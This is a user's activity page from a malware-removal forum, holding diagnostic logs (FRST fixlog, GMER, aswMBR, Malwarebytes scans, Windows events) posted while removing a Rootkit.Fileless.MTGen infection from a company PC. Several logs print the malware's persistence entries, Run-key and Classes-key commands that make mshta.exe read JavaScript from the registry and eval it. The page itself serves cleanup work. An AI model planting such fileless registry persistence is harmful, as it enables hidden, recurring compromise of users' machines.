(EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (11/30/2016 09:06:30 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!Hosts File Change in File: c:\program files (x86)\slimjet\slimjet.exe by: SONAR scan. Action: . Action Description: Access Denied Error: (11/30/2016 09:06:30 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!Hosts File Change in File: c:\program files (x86)\slimjet\slimjet.exe by: SONAR scan. Action: . Action Description: Access Denied Error: (11/30/2016 09:00:30 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!Hosts File Change in File: c:\program files (x86)\slimjet\slimjet.exe by: SONAR scan. Action: . Action Description: Access Denied Error: (11/30/2016 09:00:29 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS) Description: Security Risk Found!Hosts File Change in File: c:\program files (x86)\slimjet\slimjet.exe by: SONAR scan. Action: . Action Description: Access Denied Error: (11/30/2016 05:08:26 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (11/30/2016 04:38:04 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (11/28/2016 07:55:11 AM) (Source: SceCli) (EventID: 1001) (User: ) Description: Security policy cannot be propagated. Cannot access the template. Error code = 3. \\ids.local\sysvol\ids.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf. Error: (11/28/2016 07:51:11 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS) Description: Failed to process policy info. Error details: "The specified network name is no longer available. ". Error: (11/28/2016 06:17:10 AM) (Source: SceCli) (EventID: 1001) (User: ) Description: Security policy cannot be propagated. Cannot access the template. Error code = 3. \\ids.local\sysvol\ids.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf. System errors: ============= Error: (11/30/2016 04:47:02 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {9E175B6D-F52A-11D8-B9A5-505054503030} Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:41:31 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The Computer Browser service depends on the Server service which failed to start because of the following error: The dependency service or group failed to start. Error: (11/30/2016 04:39:36 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: DCOM got error "1068" attempting to start the service fdPHost with arguments "" in order to run the server: {D3DCB472-7261-43CE-924B-0704BD730D5F} Error: (11/30/2016 04:39:35 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: DCOM got error "1068" attempting to start the service fdPHost with arguments "" in order to run the server: {145B4335-FE2A-4927-A040-7C35AD3180EF} Error: (11/30/2016 04:38:35 AM) (Source: DCOM) (EventID: 10005) (User: ) Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} CodeIntegrity: =================================== Date: 2016-11-01 13:28:46.075 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-11-01 13:28:46.012 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-11-01 13:28:45.950 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-11-01 13:28:45.887 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-05-26 11:17:53.508 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-05-26 11:17:53.446 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-05-26 11:17:53.399 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-05-26 11:17:53.337 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2015-09-18 10:50:59.242 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2015-09-18 10:50:59.210 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-2320 CPU @ 3.00GHz Percentage of memory in use: 24% Total physical RAM: 8161.36 MB Available physical RAM: 6125.31 MB Total Virtual: 16320.89 MB Available Virtual: 14303.69 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:465.66 GB) (Free:376.59 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 158191E4) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
- December 1, 2016
- 20 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

LOLs > " This log will be excessive " Thank you for your help *and* the laughs! cureit.log
- November 30, 2016
- 20 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Delayed due to holidays. Will reply next week. Thank you.
- November 25, 2016
- 20 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Thank you again. Fix result of Farbar Recovery Scan Tool (x64) Version: 20-11-2016 01 Ran by cjerald (23-11-2016 05:39:39) Run:3 Running from \\SPARTA\RedirectedFolders\cjerald\Desktop Loaded Profiles: cjerald (Available Profiles: Clayton & cjerald) Boot Mode: Normal ============================================== fixlist content: ***************** Start Reg: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys" end ***************** ========= reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys" ========= ERROR: Access is denied. ========= End of Reg: ========= ==== End of Fixlog 05:39:42 ====
- November 23, 2016
- 20 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Thank for your continuing diligence! :-) GMER 2.2.19882 - http://www.gmer.net Rootkit scan 2016-11-23 03:37:50 Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-2 WDC_WD5003AZEX-00K1GA0 rev.80.00A80 465.76GB Running: vixxw3jv.exe; Driver: C:\Users\cjerald\AppData\Local\Temp\pxldapow.sys ---- Registry - GMER 2.2 ---- Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\f065dd6bdb86 Reg HKLM\SYSTEM\CurrentControlSet\services\BTHPORT\Parameters\Keys\f065dd6bdb86@0000000019c1 0xBE 0x4C 0x9B 0xEE ... Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\f065dd6bdb86 (not active ControlSet) Reg HKLM\SYSTEM\ControlSet002\services\BTHPORT\Parameters\Keys\f065dd6bdb86@0000000019c1 0xBE 0x4C 0x9B 0xEE ... ---- EOF - GMER 2.2 ---- aswMBR version 1.0.1.2290 Copyright(c) 2014 AVAST Software Run date: 2016-11-23 03:40:36 ----------------------------- 03:40:36.147 OS Version: Windows x64 6.1.7601 Service Pack 1 03:40:36.147 Number of processors: 4 586 0x2A07 03:40:36.147 ComputerName: PC-8 UserName: 03:40:39.761 Initialize success 03:40:39.839 VM: initialized successfully 03:40:39.839 VM: Intel CPU supported 03:40:45.698 VM: supported disk I/O ataport.SYS 03:42:00.855 AVAST engine defs: 16112201 03:42:05.997 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-2 03:42:06.007 Disk 0 Vendor: WDC_WD5003AZEX-00K1GA0 80.00A80 Size: 476940MB BusType: 3 03:42:06.457 Disk 0 MBR read successfully 03:42:06.467 Disk 0 MBR scan 03:42:06.467 Disk 0 Windows 7 default MBR code 03:42:06.497 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 100 MB offset 2048 03:42:06.517 Disk 0 default boot code 03:42:06.547 Disk 0 Partition 2 00 07 HPFS/NTFS NTFS 476838 MB offset 206848 03:42:06.677 Disk 0 scanning C:\Windows\system32\drivers 03:42:43.432 Service scanning 03:43:08.336 Modules scanning 03:43:08.664 Disk 0 trace - called modules: 03:43:08.679 ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys ataport.SYS pciide.sys PCIIDEX.SYS hal.dll atapi.sys 03:43:08.695 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8007821060] 03:43:08.695 3 CLASSPNP.SYS[fffff88000dd143f] -> nt!IofCallDriver -> [0xfffffa80073d3d10] 03:43:08.711 5 ACPI.sys[fffff88000f027a1] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP2T0L0-2[0xfffffa800756e680] 03:43:12.657 AVAST engine scan C:\Windows 03:43:24.539 AVAST engine scan C:\Windows\system32 03:48:06.945 AVAST engine scan C:\Windows\system32\drivers 03:48:35.066 AVAST engine scan C:\Users\cjerald 03:59:06.261 AVAST engine scan C:\ProgramData 04:07:28.085 Disk 0 statistics 7105423/0/0 @ 2.99 MB/s 04:07:28.100 Scan finished successfully 04:07:40.828 Disk 0 MBR has been saved successfully to "\\SPARTA\RedirectedFolders\cjerald\Desktop\MBR.dat" 04:07:40.938 The log file has been saved successfully to "\\SPARTA\RedirectedFolders\cjerald\Desktop\aswMBR.txt"
- November 23, 2016
- 20 replies
Help with Rootkit.Fileless.MTGen please

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Same ones appear (have reappeared?) as before. Please also see fixlog.txt below to prove it was run. Also included rescan by MBAM after MBAM removal and reboot. Look forward to your advice on next steps. Thank you again. Fix result of Farbar Recovery Scan Tool (x64) Version: 20-11-2016 01 Ran by CJerald (21-11-2016 02:01:12) Run:1 Running from \\SPARTA\RedirectedFolders\cjerald\Desktop Loaded Profiles: CJerald (Available Profiles: Clayton & CJerald) Boot Mode: Normal ============================================== fixlist content: ***************** Start CreateRestorePoint: CloseProcesses: KU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**pmrnby<*>] => "C:\Windows\system32\mshta.exe" javascript:T3ijyR1="CI6m7d";C90X=new%20ActiveXObject("WScript.Shell");v3atS8h="c";uT1ax2=C90X.RegRead("HKCU\\software\\auux\\onnlw");LK9oPb9="8oAt";eval(uT1ax2);Xr1GT=" (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**wqgzvwnow<*>] => "C:\Users\cjerald\AppData\Local\322148\4c5510.lnk" <===== ATTENTION (Value Name with invalid characters) C:\Users\cjerald\AppData\Local\322148\4c5510.lnk C:\Users\cjerald\AppData\Local\322148 IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File GroupPolicyScripts: Restriction <======= ATTENTION GroupPolicyScripts\User: Restriction <======= ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION S4 LMIRfsClientNP; no ImagePath S3 aswVmm; \??\C:\Users\cjerald\AppData\Local\Temp\aswVmm.sys [X] S3 catchme; \??\C:\ComboFix\catchme.sys [X] Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat () HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Classes\d122cd: "C:\Windows\system32\mshta.exe" "javascript:iPH9j5="V15iBXVx";s12d=new ActiveXObject("WScript.Shell");M40aWd="cEsTuKN";TtXA7=s12d.RegRead("HKCU\\software\\auux\\onnlw");FU76Gv="LccebV4j";eval(TtXA7);Br6Aj="O1GiJK";" <===== ATTENTION CMD: ipconfig /flushdns Hosts: EmptyTemp: end ***************** Restore point was successfully created. Processes closed successfully. KU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [**pmrnby<*>] => "C:\Windows\system32\mshta.exe" javascript:T3ijyR1="CI6m7d";C90X=new%20ActiveXObject("WScript.Shell");v3atS8h="c";uT1ax2=C90X.RegRead("HKCU\\software\\auux\\onnlw");LK9oPb9="8oAt";eval(uT1ax2);Xr1GT=" (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters) => Error: No automatic fix found for this entry. HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Windows\CurrentVersion\Run\\**wqgzvwnow<*> => value removed successfully C:\Users\cjerald\AppData\Local\322148\4c5510.lnk => moved successfully C:\Users\cjerald\AppData\Local\322148 => moved successfully "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\ehshell.exe" => key removed successfully "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => key removed successfully HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found. C:\Windows\system32\GroupPolicy\Machine => moved successfully C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully C:\Windows\system32\GroupPolicy\User => moved successfully "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully "HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully LMIRfsClientNP => service removed successfully aswVmm => service removed successfully catchme => service removed successfully C:\Users\cjerald\AppData\Local\322148\4c5510.lnk => not found. "HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Classes\d122cd" => key removed successfully ========= ipconfig /flushdns ========= Windows IP Configuration Successfully flushed the DNS Resolver Cache. ========= End of CMD: ========= "C:\Windows\System32\Drivers\etc\hosts" => Could not move. Could not restore Hosts. =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10156192 B Java, Flash, Steam htmlcache => 19615 B Windows/system/drivers => 18531 B Edge => 0 B Chrome => 71066066 B Firefox => 2293760 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 33058 B systemprofile32 => 33186 B LocalService => 66228 B NetworkService => 0 B clayton => 1102190 B cjerald => 640332832 B Connie => 58687 B UpdatusUser => 0 B RecycleBin => 56445 B EmptyTemp: => 699.6 MB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 02:13:38 ==== Malwarebytes Anti-Malware www.malwarebytes.org Scan Date: 11/22/2016 Scan Time: 12:52 AM Logfile: Administrator: Yes Version: 2.2.1.1043 Malware Database: v2016.11.22.05 Rootkit Database: v2016.11.20.01 License: Free Malware Protection: Disabled Malicious Website Protection: Disabled Self-protection: Disabled OS: Windows 7 Service Pack 1 CPU: x64 File System: NTFS User: CJerald Scan Type: Threat Scan Result: Completed Objects Scanned: 392922 Time Elapsed: 10 min, 58 sec Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Enabled Heuristics: Enabled PUP: Enabled PUM: Enabled Processes: 0 (No malicious items detected) Modules: 0 (No malicious items detected) Registry Keys: 1 Rootkit.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\D122CD\SHELL\OPEN\COMMAND, Quarantined, [0647972c7a20f5413436964556ac1de3], Registry Values: 3 Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^wqgzvwnow, Quarantined, [113cdbe8a3f73ff760095588d131857b], Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^pmrnby, Quarantined, [1c31ae151a80270fc5a329b46e948878], Rootkit.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\d122cd\SHELL\OPEN\COMMAND, "C:\Windows\system32\mshta.exe" "javascript:s0PmbB6="2IgugC";K9V=new ActiveXObject("WScript.Shell");HJ7J6r="eNJ";VJ0zZ=K9V.RegRead("HKCU\\software\\auux\\onnlw");uj6Zkjh="Pmye";eval(VJ0zZ);uf6RJX="K1zwrl";", Quarantined, [0647972c7a20f5413436964556ac1de3] Registry Data: 0 (No malicious items detected) Folders: 0 (No malicious items detected) Files: 2 PUP.Optional.InstallCore, \\SPARTA\REDIRECTEDFOLDERS\SPARTA\REDIRECTEDFOLDERS\cjerald\MY DOCUMENTS\downloads\PDFConverterSetup.exe, Quarantined, [2d203c879901be78370e2d0cd0312cd4], Rootkit.Fileless.MTGen, C:\Users\cjerald\AppData\Local\322148\83934e.bat, Quarantined, [60ed408337630f27d113b6e1ca3916ea], Physical Sectors: 0 (No malicious items detected) (end) Malwarebytes Anti-Malware www.malwarebytes.org Scan Date: 11/22/2016 Scan Time: 1:22 AM Logfile: Administrator: Yes Version: 2.2.1.1043 Malware Database: v2016.11.22.05 Rootkit Database: v2016.11.20.01 License: Free Malware Protection: Disabled Malicious Website Protection: Disabled Self-protection: Disabled OS: Windows 7 Service Pack 1 CPU: x64 File System: NTFS User: cjerald Scan Type: Threat Scan Result: Completed Objects Scanned: 392613 Time Elapsed: 14 min, 58 sec Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Enabled Heuristics: Enabled PUP: Enabled PUM: Enabled Processes: 0 (No malicious items detected) Modules: 0 (No malicious items detected) Registry Keys: 0 (No malicious items detected) Registry Values: 2 Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^pmrnby, , [66e7a2211486c76f05630bd21de5a957], Trojan.Fileless.MTGen, HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^wqgzvwnow, , [014c6c574b4f55e142277469d82aad53], Registry Data: 0 (No malicious items detected) Folders: 0 (No malicious items detected) Files: 1 Rootkit.Fileless.MTGen, C:\Users\cjerald\AppData\Local\322148\83934e.bat, , [4ffec7fc9a0095a108dcc2d59a69a060], Physical Sectors: 0 (No malicious items detected) (end)
- November 22, 2016
- 20 replies
Another Rootkit.Fileless.MTGen?

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Yes. It is at a company I'm helping. Since you haven't replied with instructions, can you still help? Hope I haven't crossed some line. Thanks in advance.
- November 22, 2016
- 3 replies
Another Rootkit.Fileless.MTGen?

CGTIII posted a topic in Resolved Malware Removal Logs

Appears I have another system infected. Assistance appreciated. - CT FRST.txt Addition.txt
- November 21, 2016
- 3 replies
Help with Rootkit.Fileless.MTGen please

CGTIII posted a topic in Resolved Malware Removal Logs

It always reappears. I've tried Malwarebytes, Malwarebytes Anti-Rootkit, Panda Anti-Rootkit, ESET Online Scanner, and Sophos AntiVirus. OB1, where are you? LOL Thanks in advance. FRST.txt Addition.txt
- November 19, 2016
- 20 replies

Sign In

CGTIII

Posts

Joined

Last visited

Content Type

Events

Profiles

Forums

Everything posted by CGTIII

Infection and Freezing

Infection and Freezing

Infection and Freezing

Help with Rootkit.Fileless.MTGen please

Help with Rootkit.Fileless.MTGen please

Help with Rootkit.Fileless.MTGen please

Help with Rootkit.Fileless.MTGen please

Help with Rootkit.Fileless.MTGen please

Help with Rootkit.Fileless.MTGen please

Help with Rootkit.Fileless.MTGen please

Help with Rootkit.Fileless.MTGen please

Help with Rootkit.Fileless.MTGen please

Another Rootkit.Fileless.MTGen?

Another Rootkit.Fileless.MTGen?

Help with Rootkit.Fileless.MTGen please

Browse

Activity

Personal

Business

Business Modules

Partners

Learn

Start here

Type of malware/attacks

How does it get on my computer?

Scams and grifts

Support

Important Information